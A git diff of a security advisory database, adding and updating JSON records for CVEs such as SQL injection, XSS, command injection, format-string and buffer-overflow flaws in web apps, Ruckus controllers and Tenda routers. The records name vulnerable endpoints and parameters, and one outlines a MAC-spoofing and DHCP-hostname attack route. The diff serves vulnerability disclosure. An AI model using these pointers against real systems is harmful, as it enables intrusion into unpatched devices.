b/advisories/unreviewed/2025/03/GHSA-6qvm-8hqf-vwf3/GHSA-6qvm-8hqf-vwf3.json index e5f7b5a064bcf..4a3a641dca24a 100644 --- a/advisories/unreviewed/2025/03/GHSA-6qvm-8hqf-vwf3/GHSA-6qvm-8hqf-vwf3.json +++ b/advisories/unreviewed/2025/03/GHSA-6qvm-8hqf-vwf3/GHSA-6qvm-8hqf-vwf3.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-284" + "CWE-284", + "CWE-798" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/03/GHSA-743h-33qg-wchq/GHSA-743h-33qg-wchq.json b/advisories/unreviewed/2025/03/GHSA-743h-33qg-wchq/GHSA-743h-33qg-wchq.json index 04470b0e6c88d..6e6800b27f0db 100644 --- a/advisories/unreviewed/2025/03/GHSA-743h-33qg-wchq/GHSA-743h-33qg-wchq.json +++ b/advisories/unreviewed/2025/03/GHSA-743h-33qg-wchq/GHSA-743h-33qg-wchq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-743h-33qg-wchq", - "modified": "2025-03-11T15:31:02Z", + "modified": "2025-07-24T21:30:33Z", "published": "2025-03-11T15:31:02Z", "aliases": [ "CVE-2024-52960" diff --git a/advisories/unreviewed/2025/03/GHSA-h7wp-62hc-fvm5/GHSA-h7wp-62hc-fvm5.json b/advisories/unreviewed/2025/03/GHSA-h7wp-62hc-fvm5/GHSA-h7wp-62hc-fvm5.json index 75a351f00615c..3dee54a44075c 100644 --- a/advisories/unreviewed/2025/03/GHSA-h7wp-62hc-fvm5/GHSA-h7wp-62hc-fvm5.json +++ b/advisories/unreviewed/2025/03/GHSA-h7wp-62hc-fvm5/GHSA-h7wp-62hc-fvm5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-h7wp-62hc-fvm5", - "modified": "2025-03-11T15:31:01Z", + "modified": "2025-07-24T21:30:32Z", "published": "2025-03-11T15:31:01Z", "aliases": [ "CVE-2024-33501" diff --git a/advisories/unreviewed/2025/03/GHSA-hh2m-m355-4q3p/GHSA-hh2m-m355-4q3p.json b/advisories/unreviewed/2025/03/GHSA-hh2m-m355-4q3p/GHSA-hh2m-m355-4q3p.json index 046c9541ebaad..736632497a273 100644 --- a/advisories/unreviewed/2025/03/GHSA-hh2m-m355-4q3p/GHSA-hh2m-m355-4q3p.json +++ b/advisories/unreviewed/2025/03/GHSA-hh2m-m355-4q3p/GHSA-hh2m-m355-4q3p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hh2m-m355-4q3p", - "modified": "2025-03-14T18:30:49Z", + "modified": "2025-07-24T21:30:33Z", "published": "2025-03-14T18:30:49Z", "aliases": [ "CVE-2022-29059" diff --git a/advisories/unreviewed/2025/03/GHSA-p7mf-j4fj-4rq3/GHSA-p7mf-j4fj-4rq3.json b/advisories/unreviewed/2025/03/GHSA-p7mf-j4fj-4rq3/GHSA-p7mf-j4fj-4rq3.json index 6cd14798cd2f1..bc0fddc8eff8f 100644 --- a/advisories/unreviewed/2025/03/GHSA-p7mf-j4fj-4rq3/GHSA-p7mf-j4fj-4rq3.json +++ b/advisories/unreviewed/2025/03/GHSA-p7mf-j4fj-4rq3/GHSA-p7mf-j4fj-4rq3.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-358" + "CWE-358", + "CWE-787" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-259q-pfhc-h3v8/GHSA-259q-pfhc-h3v8.json b/advisories/unreviewed/2025/07/GHSA-259q-pfhc-h3v8/GHSA-259q-pfhc-h3v8.json new file mode 100644 index 0000000000000..a2d1b43baf156 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-259q-pfhc-h3v8/GHSA-259q-pfhc-h3v8.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-259q-pfhc-h3v8", + "modified": "2025-07-24T21:30:40Z", + "published": "2025-07-24T21:30:40Z", + "aliases": [ + "CVE-2025-8123" + ], + "details": "A vulnerability was found in deerwms deer-wms-2 up to 3.3. It has been classified as critical. Affected is an unknown function of the file /system/dept/edit. The manipulation of the argument ancestors leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8123" + }, + { + "type": "WEB", + "url": "https://gitee.com/deerwms/deer-wms-2/issues/ICLRFL" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317508" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317508" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.619691" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T21:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-2g7m-ph9x-7q7m/GHSA-2g7m-ph9x-7q7m.json b/advisories/unreviewed/2025/07/GHSA-2g7m-ph9x-7q7m/GHSA-2g7m-ph9x-7q7m.json new file mode 100644 index 0000000000000..0b8eb5c325ac5 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-2g7m-ph9x-7q7m/GHSA-2g7m-ph9x-7q7m.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2g7m-ph9x-7q7m", + "modified": "2025-07-24T21:30:39Z", + "published": "2025-07-24T21:30:39Z", + "aliases": [ + "CVE-2025-6998" + ], + "details": "ReDoS in strip_whitespaces() function in cps/string_helper.py in janeczku Calibre Web 0.6.24 (Nicolette) allows unauthenticated remote attackers to cause denial of service via specially crafted username parameter that triggers catastrophic backtracking during login.\n\n\nReDoS in strip_whitespaces() function in cps/string_helper.py in gelbphoenix Autocaliweb 0.7.0 on allows unauthenticated remote attackers to cause denial of service via specially crafted username parameter that triggers catastrophic backtracking during login.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6998" + }, + { + "type": "WEB", + "url": "https://fluidattacks.com/advisories/megadeth" + }, + { + "type": "WEB", + "url": "https://github.com/gelbphoenix/autocaliweb" + }, + { + "type": "WEB", + "url": "https://github.com/janeczku/calibre-web" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1333" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T20:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-585m-wrg3-hrv2/GHSA-585m-wrg3-hrv2.json b/advisories/unreviewed/2025/07/GHSA-585m-wrg3-hrv2/GHSA-585m-wrg3-hrv2.json index fc88024c41028..0239ae89cd1f5 100644 --- a/advisories/unreviewed/2025/07/GHSA-585m-wrg3-hrv2/GHSA-585m-wrg3-hrv2.json +++ b/advisories/unreviewed/2025/07/GHSA-585m-wrg3-hrv2/GHSA-585m-wrg3-hrv2.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-585m-wrg3-hrv2", - "modified": "2025-07-17T18:31:14Z", + "modified": "2025-07-24T21:30:38Z", "published": "2025-07-17T18:31:14Z", "aliases": [ "CVE-2025-53867" ], "details": "Island Lake WebBatch before 2025C allows Remote Code Execution via a crafted URL.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-94" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-17T16:15:35Z" diff --git a/advisories/unreviewed/2025/07/GHSA-5jcw-5gh7-q3j5/GHSA-5jcw-5gh7-q3j5.json b/advisories/unreviewed/2025/07/GHSA-5jcw-5gh7-q3j5/GHSA-5jcw-5gh7-q3j5.json index a07750404186a..3c46f609bc3d6 100644 --- a/advisories/unreviewed/2025/07/GHSA-5jcw-5gh7-q3j5/GHSA-5jcw-5gh7-q3j5.json +++ b/advisories/unreviewed/2025/07/GHSA-5jcw-5gh7-q3j5/GHSA-5jcw-5gh7-q3j5.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-5jcw-5gh7-q3j5", - "modified": "2025-07-21T15:30:31Z", + "modified": "2025-07-24T21:30:39Z", "published": "2025-07-21T15:30:31Z", "aliases": [ "CVE-2025-46123" ], "details": "An issue was discovered in CommScope Ruckus Unleashed prior to 200.15.6.212.14 and 200.17.7.0.139, and in Ruckus ZoneDirector prior to 10.5.1.0.279, where the authenticated configuration endpoint `/admin/_conf.jsp` writes the Wi-Fi guest password to memory with snprintf using the attacker-supplied value as the format string; a crafted password therefore triggers uncontrolled format-string processing and enables remote code execution on the controller.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-134" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-21T15:15:28Z" diff --git a/advisories/unreviewed/2025/07/GHSA-5pmg-9wjw-p4p3/GHSA-5pmg-9wjw-p4p3.json b/advisories/unreviewed/2025/07/GHSA-5pmg-9wjw-p4p3/GHSA-5pmg-9wjw-p4p3.json new file mode 100644 index 0000000000000..ce49847898e16 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-5pmg-9wjw-p4p3/GHSA-5pmg-9wjw-p4p3.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5pmg-9wjw-p4p3", + "modified": "2025-07-24T21:30:39Z", + "published": "2025-07-24T21:30:39Z", + "aliases": [ + "CVE-2025-8115" + ], + "details": "A vulnerability has been found in PHPGurukul Taxi Stand Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/new-autoortaxi-entry-form.php. The manipulation of the argument registrationnumber/licensenumber leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8115" + }, + { + "type": "WEB", + "url": "https://github.com/LagonGit/ReportCVE/issues/11" + }, + { + "type": "WEB", + "url": "https://phpgurukul.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317497" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317497" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.619641" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.619643" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T19:15:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-5vmr-wpf7-5897/GHSA-5vmr-wpf7-5897.json b/advisories/unreviewed/2025/07/GHSA-5vmr-wpf7-5897/GHSA-5vmr-wpf7-5897.json new file mode 100644 index 0000000000000..14a913c2b67d5 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-5vmr-wpf7-5897/GHSA-5vmr-wpf7-5897.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5vmr-wpf7-5897", + "modified": "2025-07-24T21:30:39Z", + "published": "2025-07-24T21:30:39Z", + "aliases": [ + "CVE-2025-51089" + ], + "details": "Tenda AC8V4 V16.03.34.06` was discovered to contain heap overflow at /goform/GetParentControlInfo.The manipulation of the argument `mac` leads to heap-based buffer overflow.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-51089" + }, + { + "type": "WEB", + "url": "https://github.com/TL-SN/IOT/blob/main/Tenda/Tenda-AC8v4%20%20V16.03.34.06/CVE-2025-51089.md" + }, + { + "type": "WEB", + "url": "http://tenda.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T15:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-6c72-qmmh-6499/GHSA-6c72-qmmh-6499.json b/advisories/unreviewed/2025/07/GHSA-6c72-qmmh-6499/GHSA-6c72-qmmh-6499.json index b27a1699f1a0f..c34bb9a41e8eb 100644 --- a/advisories/unreviewed/2025/07/GHSA-6c72-qmmh-6499/GHSA-6c72-qmmh-6499.json +++ b/advisories/unreviewed/2025/07/GHSA-6c72-qmmh-6499/GHSA-6c72-qmmh-6499.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-6c72-qmmh-6499", - "modified": "2025-07-21T15:30:31Z", + "modified": "2025-07-24T21:30:39Z", "published": "2025-07-21T15:30:31Z", "aliases": [ "CVE-2025-46121" ], "details": "An issue was discovered in CommScope Ruckus Unleashed prior to 200.15.6.212.14 and 200.17.7.0.139, where the functions `stamgr_cfg_adpt_addStaFavourite` and `stamgr_cfg_adpt_addStaIot` pass a client hostname directly to snprintf as the format string. A remote attacker can exploit this flaw either by sending a crafted request to the authenticated endpoint `/admin/_conf.jsp`, or without authentication and without direct network access to the controller by spoofing the MAC address of a favourite station and embedding malicious format specifiers in the DHCP hostname field, resulting in unauthenticated format-string processing and arbitrary code execution on the controller.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-134" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-21T15:15:28Z" diff --git a/advisories/unreviewed/2025/07/GHSA-6jm3-cv8m-6fx9/GHSA-6jm3-cv8m-6fx9.json b/advisories/unreviewed/2025/07/GHSA-6jm3-cv8m-6fx9/GHSA-6jm3-cv8m-6fx9.json index 781a63801184f..c8ffb5b7784d8 100644 --- a/advisories/unreviewed/2025/07/GHSA-6jm3-cv8m-6fx9/GHSA-6jm3-cv8m-6fx9.json +++ b/advisories/unreviewed/2025/07/GHSA-6jm3-cv8m-6fx9/GHSA-6jm3-cv8m-6fx9.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6jm3-cv8m-6fx9", - "modified": "2025-07-02T06:30:29Z", + "modified": "2025-07-24T21:30:34Z", "published": "2025-07-02T06:30:29Z", "aliases": [ "CVE-2025-3848" diff --git a/advisories/unreviewed/2025/07/GHSA-6p6h-9jg2-w75j/GHSA-6p6h-9jg2-w75j.json b/advisories/unreviewed/2025/07/GHSA-6p6h-9jg2-w75j/GHSA-6p6h-9jg2-w75j.json index 1dce5fb8d5235..9213595abb720 100644 --- a/advisories/unreviewed/2025/07/GHSA-6p6h-9jg2-w75j/GHSA-6p6h-9jg2-w75j.json +++ b/advisories/unreviewed/2025/07/GHSA-6p6h-9jg2-w75j/GHSA-6p6h-9jg2-w75j.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-6p6h-9jg2-w75j", - "modified": "2025-07-17T18:31:13Z", + "modified": "2025-07-24T21:30:37Z", "published": "2025-07-17T18:31:13Z", "aliases": [ "CVE-2023-41566" ], "details": "OA EKP v16 was discovered to contain an arbitrary download vulnerability via the component /ui/sys_ui_extend/sysUiExtend.do. This vulnerability allows attackers to obtain the password of the background administrator and further obtain database permissions.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-552" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-17T16:15:34Z" diff --git a/advisories/unreviewed/2025/07/GHSA-g2qh-fgm2-83wp/GHSA-g2qh-fgm2-83wp.json b/advisories/unreviewed/2025/07/GHSA-g2qh-fgm2-83wp/GHSA-g2qh-fgm2-83wp.json new file mode 100644 index 0000000000000..07d7d806e4f7c --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-g2qh-fgm2-83wp/GHSA-g2qh-fgm2-83wp.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g2qh-fgm2-83wp", + "modified": "2025-07-24T21:30:39Z", + "published": "2025-07-24T21:30:39Z", + "aliases": [ + "CVE-2025-51085" + ], + "details": "Tenda AC8V4 V16.03.34.06` was discovered to contain stack overflow at /goform/SetSysTimeCfg. The manipulation of the argument `timeZone` and `timeType` leads to stack-based buffer overflow.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-51085" + }, + { + "type": "WEB", + "url": "https://github.com/TL-SN/IOT/blob/main/Tenda/Tenda-AC8v4%20%20V16.03.34.06/CVE-2025-51085.md" + }, + { + "type": "WEB", + "url": "http://tenda.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T15:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-hm55-vj5m-259p/GHSA-hm55-vj5m-259p.json b/advisories/unreviewed/2025/07/GHSA-hm55-vj5m-259p/GHSA-hm55-vj5m-259p.json new file mode 100644 index 0000000000000..2a3c9e9a1e1c6 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-hm55-vj5m-259p/GHSA-hm55-vj5m-259p.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hm55-vj5m-259p", + "modified": "2025-07-24T21:30:39Z", + "published": "2025-07-24T21:30:39Z", + "aliases": [ + "CVE-2025-51082" + ], + "details": "Tenda AC8V4 V16.03.34.06` was discovered to contain stack overflow at /goform/fast_setting_wifi_set. The manipulation of the argument `timeZone` leads to stack-based buffer overflow.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-51082" + }, + { + "type": "WEB", + "url": "https://github.com/TL-SN/IOT/blob/main/Tenda/Tenda-AC8v4%20%20V16.03.34.06/CVE-2025-51082.md" + }, + { + "type": "WEB", + "url": "http://tenda.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T15:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-j2w6-jmvx-4q23/GHSA-j2w6-jmvx-4q23.json b/advisories/unreviewed/2025/07/GHSA-j2w6-jmvx-4q23/GHSA-j2w6-jmvx-4q23.json new file mode 100644 index 0000000000000..dc0b3912a1c23 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-j2w6-jmvx-4q23/GHSA-j2w6-jmvx-4q23.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j2w6-jmvx-4q23", + "modified": "2025-07-24T21:30:39Z", + "published": "2025-07-24T21:30:39Z", + "aliases": [ + "CVE-2025-31952" + ], + "details": "HCL iAutomate is affected by an insufficient session expiration. This allows tokens to remain valid indefinitely unless manually revoked, increasing the risk of unauthorized access.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-31952" + }, + { + "type": "WEB", + "url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0122646" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-613" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T21:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-jwv9-pqwx-gv9g/GHSA-jwv9-pqwx-gv9g.json b/advisories/unreviewed/2025/07/GHSA-jwv9-pqwx-gv9g/GHSA-jwv9-pqwx-gv9g.json index a4adcdca271c4..4022469a6e11b 100644 --- a/advisories/unreviewed/2025/07/GHSA-jwv9-pqwx-gv9g/GHSA-jwv9-pqwx-gv9g.json +++ b/advisories/unreviewed/2025/07/GHSA-jwv9-pqwx-gv9g/GHSA-jwv9-pqwx-gv9g.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-jwv9-pqwx-gv9g", - "modified": "2025-07-17T18:31:14Z", + "modified": "2025-07-24T21:30:38Z", "published": "2025-07-17T18:31:14Z", "aliases": [ "CVE-2024-32323" ], "details": "SQL Injection vulnerability in cnhcit.com Haichang OA v.1.0.0 allows a remote attacker to obtain sensitive information via the if parameter in hcit.project.rte.agents.UploadImages.class.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-17T17:15:35Z" diff --git a/advisories/unreviewed/2025/07/GHSA-m4mv-3rr9-5v5x/GHSA-m4mv-3rr9-5v5x.json b/advisories/unreviewed/2025/07/GHSA-m4mv-3rr9-5v5x/GHSA-m4mv-3rr9-5v5x.json index c6595e815d8f0..74a7796ff8cbd 100644 --- a/advisories/unreviewed/2025/07/GHSA-m4mv-3rr9-5v5x/GHSA-m4mv-3rr9-5v5x.json +++ b/advisories/unreviewed/2025/07/GHSA-m4mv-3rr9-5v5x/GHSA-m4mv-3rr9-5v5x.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-m4mv-3rr9-5v5x", - "modified": "2025-07-24T18:33:19Z", + "modified": "2025-07-24T21:30:39Z", "published": "2025-07-24T18:33:19Z", "aliases": [ "CVE-2025-45702" ], "details": "SoftPerfect Pty Ltd Connection Quality Monitor v1.1 was discovered to store all credentials in plaintext.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-256" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-24T17:15:32Z" diff --git a/advisories/unreviewed/2025/07/GHSA-qc4j-v7h6-xr5h/GHSA-qc4j-v7h6-xr5h.json b/advisories/unreviewed/2025/07/GHSA-qc4j-v7h6-xr5h/GHSA-qc4j-v7h6-xr5h.json new file mode 100644 index 0000000000000..0b1599f9ba4a7 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-qc4j-v7h6-xr5h/GHSA-qc4j-v7h6-xr5h.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qc4j-v7h6-xr5h", + "modified": "2025-07-24T21:30:40Z", + "published": "2025-07-24T21:30:39Z", + "aliases": [ + "CVE-2025-7404" + ], + "details": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Calibre Web, Autocaliweb allows Blind OS Command Injection.This issue affects Calibre Web: 0.6.24 (Nicolette); Autocaliweb: from 0.7.0 before 0.7.1.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7404" + }, + { + "type": "WEB", + "url": "https://fluidattacks.com/advisories/kino" + }, + { + "type": "WEB", + "url": "https://github.com/gelbphoenix/autocaliweb" + }, + { + "type": "WEB", + "url": "https://github.com/janeczku/calibre-web" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T21:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-qh33-r6h9-wf62/GHSA-qh33-r6h9-wf62.json b/advisories/unreviewed/2025/07/GHSA-qh33-r6h9-wf62/GHSA-qh33-r6h9-wf62.json index b58af915702e0..2717c2092cfef 100644 --- a/advisories/unreviewed/2025/07/GHSA-qh33-r6h9-wf62/GHSA-qh33-r6h9-wf62.json +++ b/advisories/unreviewed/2025/07/GHSA-qh33-r6h9-wf62/GHSA-qh33-r6h9-wf62.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-qh33-r6h9-wf62", - "modified": "2025-07-17T18:31:13Z", + "modified": "2025-07-24T21:30:37Z", "published": "2025-07-17T18:31:13Z", "aliases": [ "CVE-2023-47356" ], "details": "Mingyu Security Gateway before v3.0-5.3p was discovered to contain a remote command execution (RCE) vulnerability via the log_type parameter at /log/fw_security.mds.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-17T16:15:34Z" diff --git a/advisories/unreviewed/2025/07/GHSA-qp5w-v6qc-vx8v/GHSA-qp5w-v6qc-vx8v.json b/advisories/unreviewed/2025/07/GHSA-qp5w-v6qc-vx8v/GHSA-qp5w-v6qc-vx8v.json index bc011d6960a5e..a217630e5382b 100644 --- a/advisories/unreviewed/2025/07/GHSA-qp5w-v6qc-vx8v/GHSA-qp5w-v6qc-vx8v.json +++ b/advisories/unreviewed/2025/07/GHSA-qp5w-v6qc-vx8v/GHSA-qp5w-v6qc-vx8v.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-qp5w-v6qc-vx8v", - "modified": "2025-07-17T18:31:14Z", + "modified": "2025-07-24T21:30:38Z", "published": "2025-07-17T18:31:14Z", "aliases": [ "CVE-2025-51497" ], "details": "An issue was discovered in AdGuard plugin before 1.11.22 for Safari on MacOS. AdGaurd verbosely logged each url that Safari accessed when the plugin was active. These logs went into the MacOS general logs for any unsandboxed process to read. This may be disabled in version 1.11.22.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-532" + 